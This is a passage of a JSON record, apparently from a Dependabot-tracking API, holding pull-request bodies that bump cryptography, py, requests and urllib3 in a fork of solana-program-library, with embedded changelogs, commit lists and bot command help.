href=\"https://redirect.github.com/urllib3/urllib3/issues/3522\"\u003e#3522\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eUpdated exceptions to save and restore more properties during the pickle/serialization process. (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3567\"\u003e#3567\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdded \u003ccode\u003everify_flags\u003c/code\u003e option to \u003ccode\u003ecreate_urllib3_context\u003c/code\u003e with a default of \u003ccode\u003eVERIFY_X509_PARTIAL_CHAIN\u003c/code\u003e and \u003ccode\u003eVERIFY_X509_STRICT\u003c/code\u003e for Python 3.13+. (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3571\"\u003e#3571\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eBugfixes\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eFixed a bug with partial reads of streaming data in Emscripten. (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3555\"\u003e#3555\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eMisc\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eSwitched to uv for installing development dependecies. (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3550\"\u003e#3550\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eRemoved the \u003ccode\u003emultiple.intoto.jsonl\u003c/code\u003e asset from GitHub releases. Attestation of release files since v2.3.0 can be found on PyPI. (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3566\"\u003e#3566\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.3.0\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/urllib3/urllib3/blob/main/CHANGES.rst\"\u003eurllib3's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e2.5.0 (2025-06-18)\u003c/h1\u003e\n\u003ch2\u003eFeatures\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for the \u003ccode\u003ecompression.zstd\u003c/code\u003e module that is new in Python 3.14.\nSee \u003ccode\u003ePEP 784 \u0026lt;https://peps.python.org/pep-0784/\u0026gt;\u003c/code\u003e_ for more information. (\u003ccode\u003e[#3610](https://github.com/urllib3/urllib3/issues/3610) \u0026lt;https://github.com/urllib3/urllib3/issues/3610\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003cli\u003eAdded support for version 0.5 of \u003ccode\u003ehatch-vcs\u003c/code\u003e (\u003ccode\u003e[#3612](https://github.com/urllib3/urllib3/issues/3612) \u0026lt;https://github.com/urllib3/urllib3/issues/3612\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eBugfixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed a security issue where restricting the maximum number of followed\nredirects at the \u003ccode\u003eurllib3.PoolManager\u003c/code\u003e level via the \u003ccode\u003eretries\u003c/code\u003e parameter\ndid not work.\u003c/li\u003e\n\u003cli\u003eMade the Node.js runtime respect redirect parameters such as \u003ccode\u003eretries\u003c/code\u003e\nand \u003ccode\u003eredirects\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eRaised exception for \u003ccode\u003eHTTPResponse.shutdown\u003c/code\u003e on a connection already released to the pool. (\u003ccode\u003e[#3581](https://github.com/urllib3/urllib3/issues/3581) \u0026lt;https://github.com/urllib3/urllib3/issues/3581\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003cli\u003eFixed incorrect \u003ccode\u003eCONNECT\u003c/code\u003e statement when using an IPv6 proxy with \u003ccode\u003econnection_from_host\u003c/code\u003e. Previously would not be wrapped in \u003ccode\u003e[]\u003c/code\u003e. (\u003ccode\u003e[#3615](https://github.com/urllib3/urllib3/issues/3615) \u0026lt;https://github.com/urllib3/urllib3/issues/3615\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e2.4.0 (2025-04-10)\u003c/h1\u003e\n\u003ch2\u003eFeatures\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eApplied PEP 639 by specifying the license fields in pyproject.toml. (\u003ccode\u003e[#3522](https://github.com/urllib3/urllib3/issues/3522) \u0026lt;https://github.com/urllib3/urllib3/issues/3522\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003cli\u003eUpdated exceptions to save and restore more properties during the pickle/serialization process. (\u003ccode\u003e[#3567](https://github.com/urllib3/urllib3/issues/3567) \u0026lt;https://github.com/urllib3/urllib3/issues/3567\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003cli\u003eAdded \u003ccode\u003everify_flags\u003c/code\u003e option to \u003ccode\u003ecreate_urllib3_context\u003c/code\u003e with a default of \u003ccode\u003eVERIFY_X509_PARTIAL_CHAIN\u003c/code\u003e and \u003ccode\u003eVERIFY_X509_STRICT\u003c/code\u003e for Python 3.13+. (\u003ccode\u003e[#3571](https://github.com/urllib3/urllib3/issues/3571) \u0026lt;https://github.com/urllib3/urllib3/issues/3571\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eBugfixes\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed a bug with partial reads of streaming data in Emscripten. (\u003ccode\u003e[#3555](https://github.com/urllib3/urllib3/issues/3555) \u0026lt;https://github.com/urllib3/urllib3/issues/3555\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eMisc\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSwitched to uv for installing development dependecies. (\u003ccode\u003e[#3550](https://github.com/urllib3/urllib3/issues/3550) \u0026lt;https://github.com/urllib3/urllib3/issues/3550\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003cli\u003eRemoved the \u003ccode\u003emultiple.intoto.jsonl\u003c/code\u003e asset from GitHub releases. Attestation of release files since v2.3.0 can be found on PyPI. (\u003ccode\u003e[#3566](https://github.com/urllib3/urllib3/issues/3566) \u0026lt;https://github.com/urllib3/urllib3/issues/3566\u0026gt;\u003c/code\u003e__)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e2.3.0 (2024-12-22)\u003c/h1\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/aaab4eccc10c965897540b21e15f11859d0b62e7\"\u003e\u003ccode\u003eaaab4ec\u003c/code\u003e\u003c/a\u003e Release 2.5.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/7eb4a2aafe49a279c29b6d1f0ed0f42e9736194f\"\u003e\u003ccode\u003e7eb4a2a\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/f05b1329126d5be6de501f9d1e3e36738bc08857\"\u003e\u003ccode\u003ef05b132\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/d03fe327a71d09728512217149f269763671f296\"\u003e\u003ccode\u003ed03fe32\u003c/code\u003e\u003c/a\u003e Fix HTTP tunneling with IPv6 in older Python versions\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/11661e9bb4278e43d081f47a516e287a928c2206\"\u003e\u003ccode\u003e11661e9\u003c/code\u003e\u003c/a\u003e Bump github/codeql-action from 3.28.0 to 3.29.0 (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3624\"\u003e#3624\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/6a0ecc6b16fe30f721021b44a81d19615098c71e\"\u003e\u003ccode\u003e6a0ecc6\u003c/code\u003e\u003c/a\u003e Update v2 migration guide to 2.4.0 (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3621\"\u003e#3621\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/8e32e60d9024c05bc6f7adda08bdf6c539d0b0d4\"\u003e\u003ccode\u003e8e32e60\u003c/code\u003e\u003c/a\u003e Raise exception for shutdown on a connection already released to the pool (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3\"\u003e#3\u003c/a\u003e...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/9996e0fbf90b77083ad3c73737a6c6395703faa9\"\u003e\u003ccode\u003e9996e0f\u003c/code\u003e\u003c/a\u003e Fix emscripten CI for Chrome 137+ (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3599\"\u003e#3599\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/4fd1a99a59725faf0efc946ce3b6bc9a194420af\"\u003e\u003ccode\u003e4fd1a99\u003c/code\u003e\u003c/a\u003e Bump RECENT_DATE (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3617\"\u003e#3617\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/urllib3/urllib3/commit/c4b5917e911a90c8bf279448df8952a682294135\"\u003e\u003ccode\u003ec4b5917\u003c/code\u003e\u003c/a\u003e Add support for the new \u003ccode\u003ecompression.zstd\u003c/code\u003e module in Python 3.14 (\u003ca href=\"https://redirect.github.com/urllib3/urllib3/issues/3611\"\u003e#3611\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/urllib3/urllib3/compare/1.26.19...2.5.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\n\nDependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.\n\n[//]: # (dependabot-automerge-start)\n[//]: # (dependabot-automerge-end)\n\n---\n\n\u003cdetails\u003e\n\u003csummary\u003eDependabot commands and options\u003c/summary\u003e\n\u003cbr /\u003e\n\nYou can trigger Dependabot actions by commenting on this PR:\n- `@dependabot rebase` will rebase this PR\n- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it\n- `@dependabot merge` will merge this PR after your CI passes on it\n- `@dependabot squash and merge` will squash and merge this PR after your CI passes on it\n- `@dependabot cancel merge` will cancel a previously requested merge and block automerging\n- `@dependabot reopen` will reopen this PR if it is closed\n- `@dependabot close` will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually\n- `@dependabot show \u003cdependency name\u003e ignore conditions` will show all of the ignore conditions of the specified dependency\n- `@dependabot ignore \u003cdependency name\u003e major version` will close this group update PR and stop Dependabot creating any more for the specific dependency's major version (unless you unignore this specific dependency's major version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e minor version` will close this group update PR and stop Dependabot creating any more for the specific dependency's minor version (unless you unignore this specific dependency's minor version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e` will close this group update PR and stop Dependabot creating any more for the specific dependency (unless you unignore this specific dependency or upgrade to it yourself)\n- `@dependabot unignore \u003cdependency name\u003e` will remove all of the ignore conditions of the specified dependency\n- `@dependabot unignore \u003cdependency name\u003e \u003cignore condition\u003e` will remove the ignore condition of the specified dependency and ignore conditions\nYou can disable automated security fix PRs for this repo from the [Security Alerts page](https://github.com/Emadalshamery/solana-program-library/network/alerts).\n\n\u003c/details\u003e","html_url":"https://github.com/Emadalshamery/solana-program-library/pull/1","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/Emadalshamery%2Fsolana-program-library/issues/1","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/1/packages"}},{"old_version":"1.10.0","new_version":"1.11.0","update_type":"minor","path":null,"pr_created_at":"2025-06-18T22:51:29.000Z","version_change":"1.10.0 → 1.11.0","issue":{"uuid":"2603096932","node_id":"PR_kwDON5k8AM6bKBtk","number":16,"state":"open","title":"build(deps): bump the pip group across 1 directory with 4 updates","user":"dependabot[bot]","labels":["dependencies","python"],"assignees":[],"locked":false,"comments_count":0,"pull_request":true,"closed_at":null,"author_association":"NONE","state_reason":null,"created_at":"2025-06-18T22:51:29.000Z","updated_at":"2025-06-18T22:51:30.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"build(deps): bump","group_name":"pip","update_count":4,"packages":[{"name":"cryptography","old_version":"43.0.1","new_version":"44.0.1","repository_url":"https://github.com/pyca/cryptography"},{"name":"py","old_version":"1.10.0","new_version":"1.11.0","repository_url":"https://github.com/pytest-dev/py"},{"name":"requests","old_version":"2.32.0","new_version":"2.32.4","repository_url":"https://github.com/psf/requests"},{"name":"urllib3","old_version":"1.26.19","new_version":"2.5.0","repository_url":"https://github.com/urllib3/urllib3"}],"path":null,"ecosystem":"pip"},"body":"Bumps the pip group with 4 updates in the /binary-option/client directory: [cryptography](https://github.com/pyca/cryptography), [py](https://github.com/pytest-dev/py), [requests](https://github.com/psf/requests) and [urllib3](https://github.com/urllib3/urllib3).\n\nUpdates `cryptography` from 43.0.1 to 44.0.1\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pyca/cryptography/blob/main/CHANGELOG.rst\"\u003ecryptography's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003e44.0.1 - 2025-02-11\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n* Updated Windows, macOS, and Linux wheels to be compiled with OpenSSL 3.4.1.\n* We now build ``armv7l`` ``manylinux`` wheels and publish them to PyPI.\n* We now build ``manylinux_2_34`` wheels and publish them to PyPI.\n\u003cp\u003e.. _v44-0-0:\u003c/p\u003e\n\u003cp\u003e44.0.0 - 2024-11-27\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eBACKWARDS INCOMPATIBLE:\u003c/strong\u003e Dropped support for LibreSSL \u0026lt; 3.9.\u003c/li\u003e\n\u003cli\u003eDeprecated Python 3.7 support. Python 3.7 is no longer supported by the\nPython core team. Support for Python 3.7 will be removed in a future\n\u003ccode\u003ecryptography\u003c/code\u003e release.\u003c/li\u003e\n\u003cli\u003eUpdated Windows, macOS, and Linux wheels to be compiled with OpenSSL 3.4.0.\u003c/li\u003e\n\u003cli\u003emacOS wheels are now built against the macOS 10.13 SDK. Users on older\nversions of macOS should upgrade, or they will need to build\n\u003ccode\u003ecryptography\u003c/code\u003e themselves.\u003c/li\u003e\n\u003cli\u003eEnforce the :rfc:\u003ccode\u003e5280\u003c/code\u003e requirement that extended key usage extensions must\nnot be empty.\u003c/li\u003e\n\u003cli\u003eAdded support for timestamp extraction to the\n:class:\u003ccode\u003e~cryptography.fernet.MultiFernet\u003c/code\u003e class.\u003c/li\u003e\n\u003cli\u003eRelax the Authority Key Identifier requirements on root CA certificates\nduring X.509 verification to allow fields permitted by :rfc:\u003ccode\u003e5280\u003c/code\u003e but\nforbidden by the CA/Browser BRs.\u003c/li\u003e\n\u003cli\u003eAdded support for :class:\u003ccode\u003e~cryptography.hazmat.primitives.kdf.argon2.Argon2id\u003c/code\u003e\nwhen using OpenSSL 3.2.0+.\u003c/li\u003e\n\u003cli\u003eAdded support for the :class:\u003ccode\u003e~cryptography.x509.Admissions\u003c/code\u003e certificate extension.\u003c/li\u003e\n\u003cli\u003eAdded basic support for PKCS7 decryption (including S/MIME 3.2) via\n:func:\u003ccode\u003e~cryptography.hazmat.primitives.serialization.pkcs7.pkcs7_decrypt_der\u003c/code\u003e,\n:func:\u003ccode\u003e~cryptography.hazmat.primitives.serialization.pkcs7.pkcs7_decrypt_pem\u003c/code\u003e, and\n:func:\u003ccode\u003e~cryptography.hazmat.primitives.serialization.pkcs7.pkcs7_decrypt_smime\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e.. _v43-0-3:\u003c/p\u003e\n\u003cp\u003e43.0.3 - 2024-10-18\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n* Fixed release metadata for ``cryptography-vectors``\n\u003cp\u003e.. _v43-0-2:\u003c/p\u003e\n\u003cp\u003e43.0.2 - 2024-10-18\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFixed compilation when using LibreSSL 4.0.0.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e.. _v43-0-1:\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/adaaaed77db676bbaa9d171175db81dce056e2a7\"\u003e\u003ccode\u003eadaaaed\u003c/code\u003e\u003c/a\u003e Bump for 44.0.1 release (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12441\"\u003e#12441\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/ccc61dabe38b86956bf218565cd4e82b918345a1\"\u003e\u003ccode\u003eccc61da\u003c/code\u003e\u003c/a\u003e [backport] test and build on armv7l (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12420\"\u003e#12420\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12431\"\u003e#12431\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/f299a48153650f2dd87716343f2daa7cd39a1f59\"\u003e\u003ccode\u003ef299a48\u003c/code\u003e\u003c/a\u003e remove deprecated call (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12052\"\u003e#12052\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/439eb0594a9ffb7c9adedb2490998d83914d141e\"\u003e\u003ccode\u003e439eb05\u003c/code\u003e\u003c/a\u003e Bump version for 44.0.0 (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12051\"\u003e#12051\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/2c5ad4d8dcec1b8f833198bc2f3b4634c4fd9d78\"\u003e\u003ccode\u003e2c5ad4d\u003c/code\u003e\u003c/a\u003e chore(deps): bump maturin from 1.7.4 to 1.7.5 in /.github/requirements (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12050\"\u003e#12050\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/d23968adddd79aa8508d7c1f985da09383b3808f\"\u003e\u003ccode\u003ed23968a\u003c/code\u003e\u003c/a\u003e chore(deps): bump libc from 0.2.165 to 0.2.166 (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12049\"\u003e#12049\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/133c0e02edf2f172318eb27d8f50525ed64c9ec3\"\u003e\u003ccode\u003e133c0e0\u003c/code\u003e\u003c/a\u003e Bump x509-limbo and/or wycheproof in CI (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12047\"\u003e#12047\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/f2259d7aa0d134c839ebe298baa8b63de9ead804\"\u003e\u003ccode\u003ef2259d7\u003c/code\u003e\u003c/a\u003e Bump BoringSSL and/or OpenSSL in CI (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12046\"\u003e#12046\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/e201c870b89fd2606d67230a97e50c3badb07907\"\u003e\u003ccode\u003ee201c87\u003c/code\u003e\u003c/a\u003e fixed metadata in changelog (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12044\"\u003e#12044\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pyca/cryptography/commit/c6104cc3669585941dc1d2b9c6507621c53d242f\"\u003e\u003ccode\u003ec6104cc\u003c/code\u003e\u003c/a\u003e Prohibit Python 3.9.0, 3.9.1 -- they have a bug that causes errors (\u003ca href=\"https://redirect.github.com/pyca/cryptography/issues/12045\"\u003e#12045\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pyca/cryptography/compare/43.0.1...44.0.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `py` from 1.10.0 to 1.11.0\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pytest-dev/py/blob/master/CHANGELOG.rst\"\u003epy's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e1.11.0 (2021-11-04)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eSupport Python 3.11\u003c/li\u003e\n\u003cli\u003eSupport \u003ccode\u003eNO_COLOR\u003c/code\u003e environment variable\u003c/li\u003e\n\u003cli\u003eUpdate vendored apipkg: 1.5 =\u0026gt; 2.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/447bac514febbb5433963582103d48bb27b3db17\"\u003e\u003ccode\u003e447bac5\u003c/code\u003e\u003c/a\u003e Update CHANGELOG.rst\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/6d003d9fee08542b9a5ca663568cb30c75d6c27c\"\u003e\u003ccode\u003e6d003d9\u003c/code\u003e\u003c/a\u003e Update CHANGELOG.rst\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/9cf613f3c21ca31f4a1ee9a70e6bd31dc3fe42d9\"\u003e\u003ccode\u003e9cf613f\u003c/code\u003e\u003c/a\u003e Declare support for Python 3.8-3.10\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/d831150a3502363c9ca7242122d8e6cbd229169e\"\u003e\u003ccode\u003ed831150\u003c/code\u003e\u003c/a\u003e Update python_requires: Python 3.4 was already dropped\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/e68532e9d67b089b17f1c96a708ff5f8ccf8bc8b\"\u003e\u003ccode\u003ee68532e\u003c/code\u003e\u003c/a\u003e Update CHANGELOG for 1.11.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/2f03e5a7fd9eb95db110cfd1bf40b987757f9d48\"\u003e\u003ccode\u003e2f03e5a\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pytest-dev/py/issues/258\"\u003e#258\u003c/a\u003e from blueyed/NO_COLOR\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/e116b2bb8e1da9e8aef33c3606bd3d357ae28570\"\u003e\u003ccode\u003ee116b2b\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pytest-dev/py/issues/275\"\u003e#275\u003c/a\u003e from pytest-dev/upgrade-vendor-libs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/f3a1a59d7d701a76680c2d0b0bd582311b00ded0\"\u003e\u003ccode\u003ef3a1a59\u003c/code\u003e\u003c/a\u003e remove build pin again\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/f6cbf2814a2cc355d0a795233a32dc1285eec93b\"\u003e\u003ccode\u003ef6cbf28\u003c/code\u003e\u003c/a\u003e try to use pipx tox\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/3fe9ad76257860bfcdb25a23539972759ce348ed\"\u003e\u003ccode\u003e3fe9ad7\u003c/code\u003e\u003c/a\u003e try to use preinstalled tox\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pytest-dev/py/compare/1.10.0...1.11.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `requests` from 2.32.0 to 2.32.4\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/psf/requests/releases\"\u003erequests's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.32.4\u003c/h2\u003e\n\u003ch2\u003e2.32.4 (2025-06-10)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eSecurity\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eCVE-2024-47081 Fixed an issue where a maliciously crafted URL and trusted\nenvironment will retrieve credentials for the wrong hostname/machine from a\nnetrc file. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6965\"\u003e#6965\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eImprovements\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eNumerous documentation improvements\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for pypy 3.11 for Linux and macOS. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6926\"\u003e#6926\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eDropped support for pypy 3.9 following its end of support. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6926\"\u003e#6926\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.32.3\u003c/h2\u003e\n\u003ch2\u003e2.32.3 (2024-05-29)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFixed bug breaking the ability to specify custom SSLContexts in sub-classes of\nHTTPAdapter. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6716\"\u003e#6716\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixed issue where Requests started failing to run on Python versions compiled\nwithout the \u003ccode\u003essl\u003c/code\u003e module. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6724\"\u003e#6724\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.32.2\u003c/h2\u003e\n\u003ch2\u003e2.32.2 (2024-05-21)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eTo provide a more stable migration for custom HTTPAdapters impacted\nby the CVE changes in 2.32.0, we've renamed \u003ccode\u003e_get_connection\u003c/code\u003e to\na new public API, \u003ccode\u003eget_connection_with_tls_context\u003c/code\u003e. Existing custom\nHTTPAdapters will need to migrate their code to use this new API.\n\u003ccode\u003eget_connection\u003c/code\u003e is considered deprecated in all versions of Requests\u0026gt;=2.32.0.\u003c/p\u003e\n\u003cp\u003eA minimal (2-line) example has been provided in the linked PR to ease\nmigration, but we strongly urge users to evaluate if their custom adapter\nis subject to the same issue described in CVE-2024-35195. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6710\"\u003e#6710\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.32.1\u003c/h2\u003e\n\u003ch2\u003e2.32.1 (2024-05-20)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdd missing test certs to the sdist distributed on PyPI.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/psf/requests/blob/main/HISTORY.md\"\u003erequests's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.32.4 